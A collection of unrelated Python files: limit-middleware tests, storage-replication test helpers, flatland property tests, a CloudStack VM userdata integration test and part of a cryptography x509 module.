routed into our WSGI app, we then wait for the response and turn
it back into an `httplib.HTTPResponse`.
"""
if not headers:
headers = {}
req = webob.Request.blank(path)
req.method = method
req.headers = headers
req.host = self.host
req.body = body
resp = str(req.get_response(self.app))
resp = "HTTP/1.0 %s" % resp
sock = FakeHttplibSocket(resp)
self.http_response = httplib.HTTPResponse(sock)
self.http_response.begin()
def getresponse(self):
"""Return our generated response from the request."""
return self.http_response
def wire_HTTPConnection_to_WSGI(host, app):
"""Monkeypatches HTTPConnection so that if you try to connect to host, you
are instead routed straight to the given WSGI app.
After calling this method, when any code calls
httplib.HTTPConnection(host)
the connection object will be a fake. Its requests will be sent directly
to the given WSGI app rather than through a socket.
Code connecting to hosts other than host will not be affected.
This method may be called multiple times to map different hosts to
different apps.
This method returns the original HTTPConnection object, so that the caller
can restore the default HTTPConnection interface (for all hosts).
"""
class HTTPConnectionDecorator(object):
"""Wraps the real HTTPConnection class so that when you instantiate
the class you might instead get a fake instance.
"""
def __init__(self, wrapped):
self.wrapped = wrapped
def __call__(self, connection_host, *args, **kwargs):
if connection_host == host:
return FakeHttplibConnection(app, host)
else:
return self.wrapped(connection_host, *args, **kwargs)
oldHTTPConnection = httplib.HTTPConnection
httplib.HTTPConnection = HTTPConnectionDecorator(httplib.HTTPConnection)
return oldHTTPConnection
class WsgiLimiterProxyTest(BaseLimitTestSuite):
"""Tests for the `limits.WsgiLimiterProxy` class."""
def setUp(self):
"""setUp() for WsgiLimiterProxyTest.
Do some nifty HTTP/WSGI magic which allows for WSGI to be called
directly by something like the `httplib` library.
"""
super(WsgiLimiterProxyTest, self).setUp()
self.app = limits.WsgiLimiter(TEST_LIMITS)
oldHTTPConnection = (
wire_HTTPConnection_to_WSGI("169.254.0.1:80", self.app))
self.proxy = limits.WsgiLimiterProxy("169.254.0.1:80")
self.addCleanup(self._restore, oldHTTPConnection)
def _restore(self, oldHTTPConnection):
# restore original HTTPConnection object
httplib.HTTPConnection = oldHTTPConnection
def test_200(self):
"""Successful request test."""
delay = self.proxy.check_for_delay("GET", "/anything")
self.assertEqual(delay, (None, None))
def test_403(self):
"""Forbidden request test."""
delay = self.proxy.check_for_delay("GET", "/delayed")
self.assertEqual(delay, (None, None))
delay, error = self.proxy.check_for_delay("GET", "/delayed")
error = error.strip()
expected = ("60.00", "403 Forbidden\n\nOnly 1 GET request(s) can be "
"made to /delayed every minute.")
self.assertEqual((delay, error), expected)
class LimitsViewBuilderTest(test.TestCase):
def setUp(self):
super(LimitsViewBuilderTest, self).setUp()
self.view_builder = views.limits.ViewBuilder()
self.rate_limits = [{"URI": "*",
"regex": ".*",
"value": 10,
"verb": "POST",
"remaining": 2,
"unit": "MINUTE",
"resetTime": 1311272226},
{"URI": "*/volumes",
"regex": "^/volumes",
"value": 50,
"verb": "POST",
"remaining": 10,
"unit": "DAY",
"resetTime": 1311272226}]
self.absolute_limits = {"metadata_items": 1,
"injected_files": 5,
"injected_file_content_bytes": 5}
def test_build_limits(self):
tdate = "2011-07-21T18:17:06Z"
expected_limits = {
"limits": {"rate": [{"uri": "*",
"regex": ".*",
"limit": [{"value": 10,
"verb": "POST",
"remaining": 2,
"unit": "MINUTE",
"next-available": tdate}]},
{"uri": "*/volumes",
"regex": "^/volumes",
"limit": [{"value": 50,
"verb": "POST",
"remaining": 10,
"unit": "DAY",
"next-available": tdate}]}],
"absolute": {"maxServerMeta": 1,
"maxImageMeta": 1,
"maxPersonality": 5,
"maxPersonalitySize": 5}}}
output = self.view_builder.build(self.rate_limits,
self.absolute_limits)
self.assertDictMatch(output, expected_limits)
def test_build_limits_empty_limits(self):
expected_limits = {"limits": {"rate": [],
"absolute": {}}}
abs_limits = {}
rate_limits = []
output = self.view_builder.build(rate_limits, abs_limits)
self.assertDictMatch(output, expected_limits)
class LimitsXMLSerializationTest(test.TestCase):
def test_xml_declaration(self):
serializer = limits.LimitsTemplate()
fixture = {"limits": {
"rate": [],
"absolute": {}}}
output = serializer.serialize(fixture)
has_dec = output.startswith("<?xml version='1.0' encoding='UTF-8'?>")
self.assertTrue(has_dec)
def test_index(self):
tdate = "2011-12-15T22:42:45Z"
serializer = limits.LimitsTemplate()
fixture = {"limits": {"rate": [{"uri": "*",
"regex": ".*",
"limit": [{"value": 10,
"verb": "POST",
"remaining": 2,
"unit": "MINUTE",
"next-available": tdate}]},
{"uri": "*/servers",
"regex": "^/servers",
"limit": [{"value": 50,
"verb": "POST",
"remaining": 10,
"unit": "DAY",
"next-available": tdate}]}],
"absolute": {"maxServerMeta": 1,
"maxImageMeta": 1,
"maxPersonality": 5,
"maxPersonalitySize": 10240}}}
output = serializer.serialize(fixture)
root = etree.XML(output)
xmlutil.validate_schema(root, 'limits')
#verify absolute limits
absolutes = root.xpath('ns:absolute/ns:limit', namespaces=NS)
self.assertEqual(len(absolutes), 4)
for limit in absolutes:
name = limit.get('name')
value = limit.get('value')
self.assertEqual(value, str(fixture['limits']['absolute'][name]))
#verify rate limits
rates = root.xpath('ns:rates/ns:rate', namespaces=NS)
self.assertEqual(len(rates), 2)
for i, rate in enumerate(rates):
for key in ['uri', 'regex']:
self.assertEqual(rate.get(key),
str(fixture['limits']['rate'][i][key]))
rate_limits = rate.xpath('ns:limit', namespaces=NS)
self.assertEqual(len(rate_limits), 1)
for j, limit in enumerate(rate_limits):
for key in ['verb', 'value', 'remaining', 'unit',
'next-available']:
self.assertEqual(
limit.get(key),
str(fixture['limits']['rate'][i]['limit'][j][key]))
def test_index_no_limits(self):
serializer = limits.LimitsTemplate()
fixture = {"limits": {
"rate": [],
"absolute": {}}}
output = serializer.serialize(fixture)
root = etree.XML(output)
xmlutil.validate_schema(root, 'limits')
#verify absolute limits
absolutes = root.xpath('ns:absolute/ns:limit', namespaces=NS)
self.assertEqual(len(absolutes), 0)
#verify rate limits
rates = root.xpath('ns:rates/ns:rate', namespaces=NS)
self.assertEqual(len(rates), 0)
|
|
#-------------------------------------------------------------------------------
# Name: verifyactions.py
#-------------------------------------------------------------------------------
from __future__ import with_statement
__author__ = "Travis Goldie"
__email__ = "test_automation@us.sios.com"
__date__ = "03/22/2013"
__copyright__ = "(c) SIOS Technology Corp 2013"
import os
import subprocess
from dkutils import cleanValue, cleanAsType, doOnNodes, normjoin, netHelp
from dkconfig import dkconfig
def with_verification(config, paramList, verifier):
"""
Purpose:
Runs the given verifier function but handles
all the verification stuff.
Args for verifier:
Config, postrunClient, *paramList
"""
false = config.returncodes["false"]
funcName = verifier.__name__
#Requires 4 args.
if len(paramList) < 3:
config.logger.error("Need at least 3 Args for {}. Command Failed".
format(funcName))
return false
elif len(paramList) > 4:
config.logger.error("Too many Args for {}. Command Failed".
format(funcName))
return false
target = paramList[1]
#Get the remote client
client = config.getPostrunClient(target)
if client is None:
config.logger.error("Failed to get a remote client {} for cmd {}".
format(target, funcName))
return false
return verifier(config, client, paramList)
def mirrorverifier(config, client, args):
"""
Purpose:
Run verifymirror on "target". Args is a list.
Args:
0 - source
1 - target
2 - sourceVol
3 - targetVol
"""
return client.verifymirror(*args)
def checksumverifier(config, client, args):
"""
Purpose:
Run verifymirror on "target". Args is a list.
Args:
0 - source
1 - target
2 - sourceVol
3 - targetVol
"""
return client.verifychecksum(*args)
def deleteverifier(config, client, args):
"""
Purpose:
Run verifymirror on "target". Args is a list.
Args:
0 - source
1 - target
2 - sourceVol
3 - targetVol
"""
return client.verifydelete(*args)
def lockverifier(config, client, args):
"""
Purpose:
Run verifylock on "target". Args is a list.
Args:
0 - target
1 - targetVol
"""
return client.verifylock(*args)
def unlockverifier(config, client, args):
"""
Purpose:
Run verifylock on "target". Args is a list.
Args:
0 - target
1 - targetVol
"""
return client.verifyunlock(*args)
# some handle-wrappers since the consumers of these
# already expect it this way
#-------------------------------------------------------------------------------
# Functions that will be called from scenarios.
#-------------------------------------------------------------------------------
def verifymirror(config, paramList):
"""
Verify the results of mirror creation.
"""
return with_verification(config,
paramList,
mirrorverifier)
def verifychecksum(config, paramList):
"""
Verify the results of mirror replication.
"""
return with_verification(config,
paramList,
checksumverifier)
def verifydelete(config, paramList):
"""
Verify the results of mirror deletion.
"""
return with_verification(config,
paramList,
deleteverifier)
def verifylock(config, paramList):
"""
Verify the results of locking volume.
"""
return with_verification(config,
paramList,
lockverifier)
def verifyunlock(config, paramList):
"""
Verify the results of unlocking volume.
"""
return with_verification(config,
paramList,
unlockverifier)
def writefile(config, paramList):
"""
Purpose:
Uses WriteFile.exe to write to volume.
Args:
0 - target
1 - targetVol
2 - filesize (Size of each file generated
3 - count (Optional; number of files to generate)
4 - background (Optional)
0 - Wait until process completes (default)
1 - Start all processes and then return
"""
#NOTE: Unlike verify* functions there is no need for a "filewriter" function
#Nor does this function need to call with_verification. All that work
#is done within this function
false = config.returncodes["false"]
funcName = __name__
#writefile requires at least 3 parameters. All others optional.
if len(paramList) < 3:
config.logger.error("Need at least 3 Args for {}. Command Failed".
format(funcName))
return false
elif len(paramList) > 5:
config.logger.error("Too many Args for {}. Command Failed".
format(funcName))
return false
target = paramList[0]
#Get the remote client
client = config.getPostrunClient(target)
if client is None:
config.logger.error("Failed to get a remote client {} for cmd {}".
format(target, funcName))
return false
return client.writefile(*paramList)
def panic(config, paramList):
"""
Purpose:
Panics (crashes) the target node.
Args:
0 - target
1 - delay (the delay in seconds to wait before panic)
"""
#NOTE: Unlike verify* functions there is no need for a "dopanic" function
#Nor does this function need to call with_verification. All that work
#is done within this function
false = config.returncodes["false"]
funcName = __name__
#Writefile requires 2 args.
if len(paramList) < 2:
config.logger.error("Need at least 3 Args for {}. Command Failed".
format(funcName))
return false
elif len(paramList) > 2:
config.logger.error("Too many Args for {}. Command Failed".
format(funcName))
return false
target = paramList[0]
#Get the remote client
client = config.getPostrunClient(target)
if client is None:
config.logger.error("Failed to get a remote client {} for cmd {}".
format(target, funcName))
return false
return client.panic(*paramList)
def verifyexternal(config, cmdName, expectedRetCode, expectedOutput, paramList):
"""
Runs the external command (cmd and args described by 'args')
and verifies it's output/exit code.
"""
false = config.returncodes["false"]
success = config.returncodes["success"]
resultFlag = True
netHelpMsg = ""
maxLen = config.settings["maxoutputlen"]
#config.logger.debug("Testname {}, Paramlist {}".format(testName, paramList))
try:
output = subprocess.check_output(paramList, stderr=subprocess.STDOUT)
retCode = success
except subprocess.CalledProcessError as err:
#This is the error from subprocess. If any test has a non-zero
#return code it will be caught here and then can be used in the
#comparisions below.
output = err.output
retCode = err.returncode
netHelpMsg = netHelp(retCode)
except WindowsError as err:
config.logger.exception("Failed to find file {}".format(paramList[0]))
raise err
#Need to decode output so it can be compared to expectedOutput
if isinstance(output, bytes):
output = output.decode("utf-8")
if expectedRetCode and retCode != expectedRetCode:
config.logger.error("FAILED cmd {} Got error code \"{}\", "
"expected \"{}\"".
format(cmdName,
retCode,
expectedRetCode))
config.logger.debug("Net help: {}".format(netHelpMsg))
resultFlag = False
if expectedOutput and output != expectedOutput:
config.logger.error("FAILED cmd {} with output \"{}\", "
"expected \"{}\"".
format(cmdName,
output[:maxLen],
expectedOutput[:maxLen]))
#config.logger.debug("Full output: {}".format(output))
resultFlag = False
return resultFlag
if __name__ == '__main__':
pass
|
|
from flatland import String
from flatland.schema.properties import Properties
import six
import pytest
def test_empty():
class Base(object):
properties = Properties()
assert not Base.properties
b = Base()
assert not b.properties
assert not Base.properties
assert Base.properties == {}
assert Base().properties == {}
class Sub(Base):
pass
assert Sub.properties == {}
assert Sub().properties == {}
Sub().properties['abc'] = 123
assert Sub.properties == {}
assert Sub().properties == {}
assert Base.properties == {}
assert Base().properties == {}
Sub.properties['def'] = 456
assert Base.properties == {}
assert Base().properties == {}
def test_dictlike():
class Base(object):
properties = Properties({'def': 456}, abc=123)
props = Base.properties
assert sorted(props.items()) == [('abc', 123), ('def', 456)]
assert sorted(props.keys()) == ['abc', 'def']
assert sorted(six.iterkeys(props)) == ['abc', 'def']
assert sorted(props.values()) == [123, 456]
assert sorted(six.itervalues(props)) == [123, 456]
assert props.get('abc') == 123
assert props.get('abc', 'blah') == 123
assert props.get('blah', 'default') == 'default'
assert props.get('blah') is None
with pytest.raises(NotImplementedError):
props.popitem()
assert 'abc' in props
assert 'ghi' not in props
assert props == {'abc': 123, 'def': 456}
assert props != {'ghi': 789}
assert props
props.clear()
assert not props
assert repr(props) == '{}'
def test_instance_population():
class Base(object):
properties = Properties()
assert not Base.properties
b = Base()
b.properties.update(a=1, b=2, c=3)
assert b.properties == {'a': 1, 'b': 2, 'c': 3}
assert Base.properties == {}
class Sub(Base):
pass
assert Sub.properties == {}
s = Sub()
assert s.properties == {}
s.properties['d'] = 4
assert s.properties == {'d': 4}
assert Sub.properties == {}
assert Base.properties == {}
assert Sub().properties == {}
def test_instance_overlay():
class Base(object):
properties = Properties()
Base.properties['a'] = 1
b = Base()
b.properties['b'] = 2
assert Base.properties == {'a': 1}
assert b.properties == {'a': 1, 'b': 2}
del b.properties['a']
assert b.properties == {'b': 2}
assert Base.properties == {'a': 1}
b.properties.update(b='x', c=3, d=4)
assert b.properties['b'] == 'x'
assert b.properties == {'b': 'x', 'c': 3, 'd': 4}
del b.properties['b']
assert b.properties == {'c': 3, 'd': 4}
with pytest.raises(KeyError):
b.properties['b']
assert b.properties.setdefault('e', 5) == 5
assert b.properties.setdefault('e', 'blah') == 5
assert b.properties == {'c': 3, 'd': 4, 'e': 5}
assert b.properties.pop('e', 'blah') == 5
assert b.properties.pop('e', 'blah') == 'blah'
with pytest.raises(KeyError):
b.properties.pop('e')
b.properties.clear()
assert b.properties == {}
assert Base.properties == {'a': 1}
Base.properties['b'] = 2
assert b.properties == {'b': 2}
assert Base.properties == {'a': 1, 'b': 2}
Base.properties.update(c=3, d=4, e=5)
del Base.properties['e']
assert b.properties == {'b': 2, 'c': 3, 'd': 4}
assert Base.properties == {'a': 1, 'b': 2, 'c': 3, 'd': 4}
def test_instance_member_assignment():
class Base(object):
properties = Properties(abc=123)
b = Base()
assert b.properties == {'abc': 123}
b.properties = {'abc': 'detached'}
assert b.properties == {'abc': 'detached'}
Base.properties['def'] = 456
assert b.properties == {'abc': 'detached'}
def test_subclass_overlay():
class Base(object):
properties = Properties()
class Middle(Base):
pass
class Lowest(Middle):
pass
Lowest.properties['def'] = 456
assert Base.properties == {}
assert Middle.properties == {}
assert Lowest.properties == {'def': 456}
Base.properties['abc'] = 123
assert Base.properties == {'abc': 123}
assert Middle.properties == {'abc': 123}
assert Lowest.properties == {'abc': 123, 'def': 456}
del Middle.properties['abc']
assert Base.properties == {'abc': 123}
assert 'abc' in Base.properties
assert Middle.properties == {}
assert 'abc' not in Middle.properties
with pytest.raises(KeyError):
Middle.properties['abc']
assert Lowest.properties == {'def': 456}
assert 'abc' not in Lowest.properties
with pytest.raises(KeyError):
Lowest.properties['abc']
Middle.properties.setdefault('ghi', 789)
Middle.properties.setdefault('ghi', 'blah')
assert Base.properties == {'abc': 123}
assert Middle.properties == {'ghi': 789}
assert Lowest.properties == {'ghi': 789, 'def': 456}
assert Lowest.properties.pop('def', 'blah') == 456
assert Lowest.properties.pop('def', 'blah') == 'blah'
with pytest.raises(KeyError):
Lowest.properties.pop('def')
assert Base.properties == {'abc': 123}
assert Middle.properties == {'ghi': 789}
assert Lowest.properties == {'ghi': 789}
Lowest.properties.clear()
assert Base.properties == {'abc': 123}
assert Middle.properties == {'ghi': 789}
assert Lowest.properties == {}
def test_subclass_override():
class Base(object):
properties = Properties()
class Middle(Base):
pass
class Override(Middle):
properties = Properties({'def': 456})
assert Override.properties == {'def': 456}
assert Middle.properties == {}
assert Base.properties == {}
Base.properties['abc'] = 123
assert Base.properties == {'abc': 123}
assert Middle.properties == {'abc': 123}
assert Override.properties == {'def': 456}
def test_initialization():
class Base(object):
properties = Properties(abc=123)
assert Base.properties == {'abc': 123}
Base.properties['def'] = 456
assert Base.properties == {'abc': 123, 'def': 456}
del Base.properties['abc']
assert Base.properties == {'def': 456}
def test_perverse():
class Base(object):
properties = Properties()
descriptor = Base.__dict__['properties']
props = Base.properties
del Base.properties
assert list(props._frames()) == []
def unattached_properties():
class Unrelated(object):
pass
return descriptor.__get__(None, Unrelated)
lost = unattached_properties()
assert lost == {}
lost2 = unattached_properties()
with pytest.raises(KeyError):
lost2['abc']
class Broken(object):
properties = 'something else'
broken = descriptor.__get__(None, Broken)
broken.update(abc=123)
assert broken == {'abc': 123}
assert Broken.properties == 'something else'
# python3 immediately raises an exception if there is such a name clash
if not six.PY3:
def test_perverse_slots():
class Base(object):
__slots__ = 'properties',
properties = Properties()
b = Base()
with pytest.raises(AttributeError):
b.properties['abc']
def test_dsl():
Sub = String.with_properties(abc=123)
assert 'abc' not in String.properties
assert Sub.properties['abc'] == 123
Disconnected = Sub.using(properties={'def': 456})
assert Disconnected.properties['def'] == 456
assert 'abc' not in Disconnected.properties
assert 'def' not in Sub.properties
assert 'def' not in String.properties
Sub.properties['ghi'] = 789
assert Disconnected.properties == {'def': 456}
Disconnected2 = Sub.using(properties=Properties(jkl=123))
assert Disconnected2.properties == {'jkl': 123}
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# this script will cover VMdeployment with Userdata tests
from marvin.cloudstackTestCase import cloudstackTestCase
from marvin.integration.lib.base import *
from marvin.integration.lib.utils import *
from marvin.integration.lib.common import *
from nose.plugins.attrib import attr
from marvin.sshClient import SshClient
import unittest
import random
import string
_multiprocess_shared_ = True
import os
class Services:
def __init__(self):
self.services = {
"account": {
"email": "test@test.com",
"firstname": "Test",
"lastname": "User",
"username": "test",
"password": "password",
},
"virtual_machine": {
"displayname": "TesVM1",
"username": "root",
"password": "password",
"ssh_port": 22,
"hypervisor": 'XenServer',
"privateport": 22,
"publicport": 22,
"protocol": 'TCP',
},
"ostype": 'CentOS 5.3 (64-bit)',
"service_offering": {
"name": "Tiny Instance",
"displaytext": "Tiny Instance",
"cpunumber": 1,
"cpuspeed": 100,
"memory": 256,
},
}
class TestDeployVmWithUserData(cloudstackTestCase):
"""Tests for UserData
"""
@classmethod
def setUpClass(cls):
cls.apiClient = super(TestDeployVmWithUserData, cls).getClsTestClient().getApiClient()
cls.services = Services().services
cls.zone = get_zone(cls.apiClient, cls.services)
if cls.zone.localstorageenabled:
#For devcloud since localstroage is enabled
cls.services["service_offering"]["storagetype"] = "local"
cls.service_offering = ServiceOffering.create(
cls.apiClient,
cls.services["service_offering"]
)
cls.account = Account.create(cls.apiClient, services=cls.services["account"])
cls.cleanup = [cls.account]
cls.template = get_template(
cls.apiClient,
cls.zone.id,
cls.services["ostype"]
)
# Generate userdata of 2500 bytes. This is larger than the 2048 bytes limit.
# CS however allows for upto 4K bytes in the code. So this must succeed.
# Overall, the query length must not exceed 4K, for then the json decoder
# will fail this operation at the marvin client side itcls.
cls.userdata = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(2500))
cls.user_data_2k= ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(2000))
cls.user_data_2kl = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(1900))
@attr(tags=["simulator", "devcloud", "basic", "advanced"])
def test_deployvm_userdata_post(self):
"""Test userdata as POST, size > 2k
"""
self.userdata=base64.b64encode(self.userdata)
self.services["virtual_machine"]["userdata"] = self.userdata
deployVmResponse = VirtualMachine.create(
self.apiClient,
services=self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
zoneid=self.zone.id,
method="POST"
)
vms = list_virtual_machines(
self.apiClient,
account=self.account.name,
domainid=self.account.domainid,
id=deployVmResponse.id
)
self.assert_(len(vms) > 0, "There are no Vms deployed in the account %s" % self.account.name)
vm = vms[0]
self.assert_(vm.id == str(deployVmResponse.id), "Vm deployed is different from the test")
self.assert_(vm.state == "Running", "VM is not in Running state")
ip_addr=deployVmResponse.ipaddress
if self.zone.networktype == "Basic":
list_router_response = list_routers(
self.apiClient,
listall="true"
)
else:
list_router_response = list_routers(
self.apiClient,
account=self.account.name,
domainid=self.account.domainid
)
self.assertEqual(
isinstance(list_router_response, list),
True,
"Check list response returns a valid list"
)
router = list_router_response[0]
hosts = list_hosts(
self.apiClient,
zoneid=router.zoneid,
type='Routing',
state='Up',
id=router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"Check list host returns a valid list"
)
host = hosts[0]
self.debug("Router ID: %s, state: %s" % (router.id, router.state))
self.assertEqual(
router.state,
'Running',
"Check list router response for router state"
)
host.user="root"
host.passwd="password"
cmd="cat /var/www/html/userdata/"+deployVmResponse.ipaddress+"/user-data"
if self.apiClient.hypervisor.lower() == 'vmware':
try:
result = get_process_status(
self.apiClient.connection.mgtSvr,
22,
self.apiClient.connection.user,
self.apiClient.connection.passwd,
router.linklocalip,
cmd,
hypervisor=self.apiClient.hypervisor
)
res = str(result)
self.assertEqual(res.__contains__(self.userdata),True,"Userdata Not applied Check the failures")
except KeyError:
self.skipTest("Marvin configuration has no host credentials to check USERDATA")
else:
try:
result = get_process_status(
host.ipaddress,
22,
host.user,
host.passwd,
router.linklocalip,
cmd
)
res = str(result)
self.assertEqual(res.__contains__(self.userdata),True,"Userdata Not applied Check the failures")
except KeyError:
self.skipTest("Marvin configuration has no host credentials to check router user data")
@classmethod
def tearDownClass(cls):
try:
#Cleanup resources used
cleanup_resources(cls.apiClient, cls.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
|
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import abc
import ipaddress
from enum import Enum
import six
from cryptography import utils
from cryptography.hazmat.primitives import hashes
_OID_NAMES = {
"2.5.4.3": "commonName",
"2.5.4.6": "countryName",
"2.5.4.7": "localityName",
"2.5.4.8": "stateOrProvinceName",
"2.5.4.10": "organizationName",
"2.5.4.11": "organizationalUnitName",
"2.5.4.5": "serialNumber",
"2.5.4.4": "surname",
"2.5.4.42": "givenName",
"2.5.4.12": "title",
"2.5.4.44": "generationQualifier",
"2.5.4.46": "dnQualifier",
"2.5.4.65": "pseudonym",
"0.9.2342.19200300.100.1.25": "domainComponent",
"1.2.840.113549.1.9.1": "emailAddress",
"1.2.840.113549.1.1.4": "md5WithRSAEncryption",
"1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
"1.2.840.113549.1.1.14": "sha224WithRSAEncryption",
"1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
"1.2.840.113549.1.1.12": "sha384WithRSAEncryption",
"1.2.840.113549.1.1.13": "sha512WithRSAEncryption",
"1.2.840.10045.4.3.1": "ecdsa-with-SHA224",
"1.2.840.10045.4.3.2": "ecdsa-with-SHA256",
"1.2.840.10045.4.3.3": "ecdsa-with-SHA384",
"1.2.840.10045.4.3.4": "ecdsa-with-SHA512",
"1.2.840.10040.4.3": "dsa-with-sha1",
"2.16.840.1.101.3.4.3.1": "dsa-with-sha224",
"2.16.840.1.101.3.4.3.2": "dsa-with-sha256",
"1.3.6.1.5.5.7.3.1": "serverAuth",
"1.3.6.1.5.5.7.3.2": "clientAuth",
"1.3.6.1.5.5.7.3.3": "codeSigning",
"1.3.6.1.5.5.7.3.4": "emailProtection",
"1.3.6.1.5.5.7.3.8": "timeStamping",
"1.3.6.1.5.5.7.3.9": "OCSPSigning",
"2.5.29.9": "subjectDirectoryAttributes",
"2.5.29.14": "subjectKeyIdentifier",
"2.5.29.15": "keyUsage",
"2.5.29.17": "subjectAltName",
"2.5.29.18": "issuerAltName",
"2.5.29.19": "basicConstraints",
"2.5.29.21": "cRLReason",
"2.5.29.24": "invalidityDate",
"2.5.29.29": "certificateIssuer",
"2.5.29.30": "nameConstraints",
"2.5.29.31": "cRLDistributionPoints",
"2.5.29.32": "certificatePolicies",
"2.5.29.33": "policyMappings",
"2.5.29.35": "authorityKeyIdentifier",
"2.5.29.36": "policyConstraints",
"2.5.29.37": "extendedKeyUsage",
"2.5.29.46": "freshestCRL",
"2.5.29.54": "inhibitAnyPolicy",
"1.3.6.1.5.5.7.1.1": "authorityInfoAccess",
"1.3.6.1.5.5.7.1.11": "subjectInfoAccess",
"1.3.6.1.5.5.7.48.1.5": "OCSPNoCheck",
"1.3.6.1.5.5.7.48.1": "OCSP",
"1.3.6.1.5.5.7.48.2": "caIssuers",
"1.3.6.1.5.5.7.2.1": "id-qt-cps",
"1.3.6.1.5.5.7.2.2": "id-qt-unotice",
}
_GENERAL_NAMES = {
0: "otherName",
1: "rfc822Name",
2: "dNSName",
3: "x400Address",
4: "directoryName",
5: "ediPartyName",
6: "uniformResourceIdentifier",
7: "iPAddress",
8: "registeredID",
}
class Version(Enum):
v1 = 0
v3 = 2
def load_pem_x509_certificate(data, backend):
return backend.load_pem_x509_certificate(data)
def load_der_x509_certificate(data, backend):
return backend.load_der_x509_certificate(data)
def load_pem_x509_csr(data, backend):
return backend.load_pem_x509_csr(data)
def load_der_x509_csr(data, backend):
return backend.load_der_x509_csr(data)
class InvalidVersion(Exception):
def __init__(self, msg, parsed_version):
super(InvalidVersion, self).__init__(msg)
self.parsed_version = parsed_version
class DuplicateExtension(Exception):
def __init__(self, msg, oid):
super(DuplicateExtension, self).__init__(msg)
self.oid = oid
class UnsupportedExtension(Exception):
def __init__(self, msg, oid):
super(UnsupportedExtension, self).__init__(msg)
self.oid = oid
class ExtensionNotFound(Exception):
def __init__(self, msg, oid):
super(ExtensionNotFound, self).__init__(msg)
self.oid = oid
class UnsupportedGeneralNameType(Exception):
def __init__(self, msg, type):
super(UnsupportedGeneralNameType, self).__init__(msg)
self.type = type
class NameAttribute(object):
def __init__(self, oid, value):
if not isinstance(oid, ObjectIdentifier):
raise TypeError(
"oid argument must be an ObjectIdentifier instance."
)
if not isinstance(value, six.text_type):
raise TypeError(
"value argument must be a text type."
)
self._oid = oid
self._value = value
oid = utils.read_only_property("_oid")
value = utils.read_only_property("_value")
def __eq__(self, other):
if not isinstance(other, NameAttribute):
return NotImplemented
return (
self.oid == other.oid and
self.value == other.value
)
def __ne__(self, other):
return not self == other
def __repr__(self):
return "<NameAttribute(oid={0.oid}, value={0.value!r})>".format(self)
class ObjectIdentifier(object):
def __init__(self, dotted_string):
self._dotted_string = dotted_string
def __eq__(self, other):
if not isinstance(other, ObjectIdentifier):
return NotImplemented
return self._dotted_string == other._dotted_string
def __ne__(self, other):
return not self == other
def __repr__(self):
return "<ObjectIdentifier(oid={0}, name={1})>".format(
self._dotted_string,
_OID_NAMES.get(self._dotted_string, "Unknown OID")
)
def __hash__(self):
return hash(self.dotted_string)
dotted_string = utils.read_only_property("_dotted_string")
class Name(object):
def __init__(self, attributes):
self._attributes = attributes
def get_attributes_for_oid(self, oid):
return [i for i in self if i.oid == oid]
def __eq__(self, other):
if not isinstance(other, Name):
return NotImplemented
return self._attributes == other._attributes
def __ne__(self, other):
return not self == other
def __iter__(self):
return iter(self._attributes)
def __len__(self):
return len(self._attributes)
def __repr__(self):
return "<Name({0!r})>".format(self._attributes)
OID_SUBJECT_DIRECTORY_ATTRIBUTES = ObjectIdentifier("2.5.29.9")
OID_SUBJECT_KEY_IDENTIFIER = ObjectIdentifier("2.5.29.14")
OID_KEY_USAGE = ObjectIdentifier("2.5.29.15")
OID_SUBJECT_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.17")
OID_ISSUER_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.18")
OID_BASIC_CONSTRAINTS = ObjectIdentifier("2.5.29.19")
OID_CRL_REASON = ObjectIdentifier("2.5.29.21")
OID_INVALIDITY_DATE = ObjectIdentifier("2.5.29.24")
OID_CERTIFICATE_ISSUER = ObjectIdentifier("2.5.29.29")
OID_NAME_CONSTRAINTS = ObjectIdentifier("2.5.29.30")
OID_CRL_DISTRIBUTION_POINTS = ObjectIdentifier("2.5.29.31")
OID_CERTIFICATE_POLICIES = ObjectIdentifier("2.5.29.32")
OID_POLICY_MAPPINGS = ObjectIdentifier("2.5.29.33")
OID_AUTHORITY_KEY_IDENTIFIER = ObjectIdentifier("2.5.29.35")
OID_POLICY_CONSTRAINTS = ObjectIdentifier("2.5.29.36")
OID_EXTENDED_KEY_USAGE = ObjectIdentifier("2.5.29.37")
OID_FRESHEST_CRL = ObjectIdentifier("2.5.29.46")
OID_INHIBIT_ANY_POLICY = ObjectIdentifier("2.5.29.54")
OID_AUTHORITY_INFORMATION_ACCESS = ObjectIdentifier("1.3.6.1.5.5.7.1.1")
OID_SUBJECT_INFORMATION_ACCESS = ObjectIdentifier("1.3.6.1.5.5.7.1.11")
OID_OCSP_NO_CHECK = ObjectIdentifier("1.3.6.1.5.5.7.48.1.5")
class Extensions(object):
def __init__(self, extensions):
self._extensions = extensions
def get_extension_for_oid(self, oid):
for ext in self:
if ext.oid == oid:
return ext
raise ExtensionNotFound("No {0} extension was found".format(oid), oid)
def __iter__(self):
return iter(self._extensions)
def __len__(self):
return len(self._extensions)
class Extension(object):
def __init__(self, oid, critical, value):
if not isinstance(oid, ObjectIdentifier):
raise TypeError(
"oid argument must be an ObjectIdentifier instance."
)
if not isinstance(critical, bool):
raise TypeError("critical must be a boolean value")
self._oid = oid
self._critical = critical
self._value = value
oid = utils.read_only_property("_oid")
critical = utils.read_only_property("_critical")
value = utils.read_only_property("_value")
